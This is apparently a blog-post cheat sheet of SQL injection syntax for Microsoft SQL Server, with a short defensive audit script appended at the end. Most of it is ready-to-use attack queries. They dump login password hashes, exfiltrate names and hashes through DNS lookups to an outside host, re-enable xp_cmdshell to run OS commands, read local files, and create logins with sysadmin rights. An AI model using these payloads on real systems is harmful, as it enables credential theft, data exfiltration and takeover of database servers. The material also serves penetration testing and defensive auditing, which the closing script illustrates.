MSSQL Injection Cheat Sheet
Nov 27, 2007 at 08:23 PM
Some useful syntax reminders for SQL Injection into MSSQL databases...


This post is part of a series of SQL Injection Cheat Sheets. In this series, I've endeavoured to tabulate the data to make it easier to read and to use the same table for each database backend. This helps to highlight any features which are lacking for each database, enumeration techniques that don't apply, and also areas that I haven't got round to researching yet.

The complete list of SQL Injection Cheat Sheets I'm working on is:

I'm not planning to write one for MS Access, but there's a great MS Access Cheat Sheet here.

Some of the queries in the table below can only be run by an admin. These are marked with "-- priv" at the end of the query. 

Version
SELECT @@version

Comments
SELECT 1 -- comment
SELECT /*comment*/1

Current User
SELECT user_name();
SELECT system_user();
SELECT user;
SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID

List Users
SELECT name FROM master..syslogins

List Password Hashes
SELECT name, password FROM master..sysxlogins -- priv, mssql 2000
SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins -- priv, mssql 2000. Need to convert to hex to return hashes in MSSQL error message.
SELECT name, password_hash FROM master.sys.sql_logins -- priv, mssql 2005
SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins -- priv, mssql 2005

List Privileges
TODO

List DBA Accounts
TODO

Current Database
SELECT DB_NAME()

List Databases
SELECT name FROM master..sysdatabases;
SELECT DB_NAME(N); -- for N = 0, 1, 2, ...

List Columns
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'mytable')

List Tables
SELECT name FROM master..sysobjects WHERE xtype = 'U'

Find Tables From Column Name
-- NB: This example works only for the current database. If you want to search another db, you need to specify the db name (e.g. replace sysobjects with mydb..sysobjects).
SELECT sysobjects.name as tablename, syscolumns.name as columnname FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = 'U' AND syscolumns.name LIKE '%PASSWORD%' -- this lists table, column for each column containing the word 'password'

Select Nth Row
SELECT TOP 1 name FROM (SELECT TOP 9 name FROM master..syslogins ORDER BY name ASC) sq ORDER BY name DESC -- gets 9th row

Select Nth Char
SELECT substring('abcd', 3, 1) -- returns c

Bitwise AND
SELECT 6 & 2 -- returns 2
SELECT 6 & 1 -- returns 0

ASCII Value -> Char
SELECT char(0x41) -- returns A

Char -> ASCII Value
SELECT ascii('A') -- returns 65

Casting
SELECT CAST('1' as int);
SELECT CAST(1 as char)

String Concatenation
SELECT 'A' + 'B' -- returns AB

If Statement
IF (1=1) SELECT 1 ELSE SELECT 2 -- returns 1

Case Statement
SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END -- returns 1

Avoiding Quotes
SELECT char(65)+char(66) -- returns AB

Time Delay
WAITFOR DELAY '0:0:5' -- pause for 5 seconds

Make DNS Requests
declare @host varchar(800); select @host = name FROM master..syslogins; exec('master..xp_getfiledetails ''\\' + @host + '\c$\boot.ini'''); -- nonpriv, works on 2000
declare @host varchar(800); select @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + '.2.pentestmonkey.net' from sys.sql_logins; exec('xp_fileexist ''\\' + @host + '\c$\boot.ini'''); -- priv, works on 2005
-- NB: Concatenation is not allowed in calls to these SPs, hence why we have to use @host. Messy but necessary.

Command Execution
EXEC xp_cmdshell 'net user'; -- priv
On MSSQL 2005 you may need to reactivate xp_cmdshell first as it's disabled by default:
EXEC sp_configure 'show advanced options', 1; -- priv
RECONFIGURE; -- priv
EXEC sp_configure 'xp_cmdshell', 1; -- priv
RECONFIGURE; -- priv

Local File Access
CREATE TABLE mydata (line varchar(8000));
BULK INSERT mydata FROM 'c:\boot.ini';
DROP TABLE mydata;

Hostname, IP Address
SELECT HOST_NAME()

Create Users
EXEC sp_addlogin 'user', 'pass'; -- priv

Drop Users
EXEC sp_droplogin 'user'; -- priv

Make User DBA
EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin'; -- priv

Location of DB files
TODO
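The Command Execution and Make User DBA rows above both depend on server state a DBA can check and undo. The following is an added audit script, not part of the original cheat sheet, that reads the sys.configurations and sys.server_role_members catalog views (present on MSSQL 2005 and later) to see whether xp_cmdshell is enabled and who holds sysadmin, then runs the enable sequence in reverse to switch xp_cmdshell back off.

```sql
-- Is xp_cmdshell switched on?  value_in_use = 1 means it is enabled right now;
-- 'show advanced options' left at 1 is itself a sign someone has been here.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');

-- Which logins hold the sysadmin role, i.e. what sp_addsrvrolemember 'user', 'sysadmin'
-- grants?  Compare against the expected list of administrative logins.
SELECT m.name AS login_name, m.type_desc, m.is_disabled
FROM sys.server_role_members rm
JOIN sys.server_principals r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals m ON m.principal_id = rm.member_principal_id
WHERE r.name = 'sysadmin'
ORDER BY m.name;

-- Turn xp_cmdshell back off.  'show advanced options' has to be on to touch
-- xp_cmdshell at all, so enable it, set xp_cmdshell to 0, then hide advanced options again.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;
```

Re-run the first query afterwards and confirm value_in_use reads 0 for both settings; an unexplained sysadmin login in the second result set is worth following up before anything else.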
Last Updated ( Aug 18, 2008 at 01:56 PM )